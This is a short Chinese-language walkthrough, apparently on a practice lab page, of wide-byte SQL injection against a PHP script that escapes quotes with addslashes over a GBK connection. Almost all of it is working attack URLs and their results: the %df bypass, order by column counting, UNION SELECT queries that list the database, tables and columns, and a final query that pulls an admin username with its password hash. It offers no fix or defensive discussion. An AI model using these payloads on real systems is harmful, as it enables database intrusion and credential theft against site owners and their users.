http://www.nanhack.com/payload/sql/wide.php?id=1' and 1=1--+ 页面正常
http://www.nanhack.com/payload/sql/wide.php?id=1' and 1=2--+ 页面正常
我们发现这里传入的单引号被转义了,sql语句变成了
select * from admins where id = '1\''
内部代码如下
$id = addslashes($_GET['id']);
$sql = "select * from admins where id = '$id'";
mysqli_set_charset($conn,"gbk");
#因为这里使用了 addslashes函数,所以输入的单引号就会被转义
因为数据库查询使用了gbk编码,所以这里我们拼接个“%df'”,这里的单引号依然会被转义。而转移符号'\'是%5c
那么语句就会变成 select * from admins where id = '1%df\''
这里注意,id = 的后面是 '1%df\'' ,也就是 '%df%5c%27',对于我们汉子来说gbk编码下 %df%5c是一个汉字 運
所以,这里就会变成 '運'' 于是我们传值尝试一下:
http://www.nanhack.com/payload/sql/wide.php?id=1%df' --+
页面成功显示了数据,但有乱码,还不能确定闭合成功,那么直接用联合查询的方式
判断显示位:
http://www.nanhack.com/payload/sql/wide.php?id=1%df' order by 8--+ #正常
http://www.nanhack.com/payload/sql/wide.php?id=1%df' order by 9--+ #不正常,则显示位为8
联合查询
http://www.nanhack.com/payload/sql/wide.php?id=-1%df' UNION SELECT 1,2,3,4,5,6,7,8--+
http://www.nanhack.com/payload/sql/wide.php?id=-1%df' UNION SELECT 1,database(),3,4,5,6,7,8--+ #得到库名nanhack
爆表
http://www.nanhack.com/payload/sql/wide.php?id=-1%df' UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--+
#得到表名 admin_logs,admins,class,facebook,kaiban,message,news,user
爆表 admins 中的所有列
http://www.nanhack.com/payload/sql/wide.php?id=-11%df' UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database() and table_name='admins'--+
# 得到 列名 id,username,userpwd,email,sex,money,role,vip
获取 admins 中的一条数据
http://www.nanhack.com/payload/sql/wide.php?id=-11%df' UNION SELECT 1,concat(username,0x23,userpwd),3,4,5,6,7,8 from admins limit 0,1--+
# 得到数据 必火网络安全#68d7e8e91c53395e3d29a938c1ab5d18(需要手动更改浏览器编码才可以显示中文)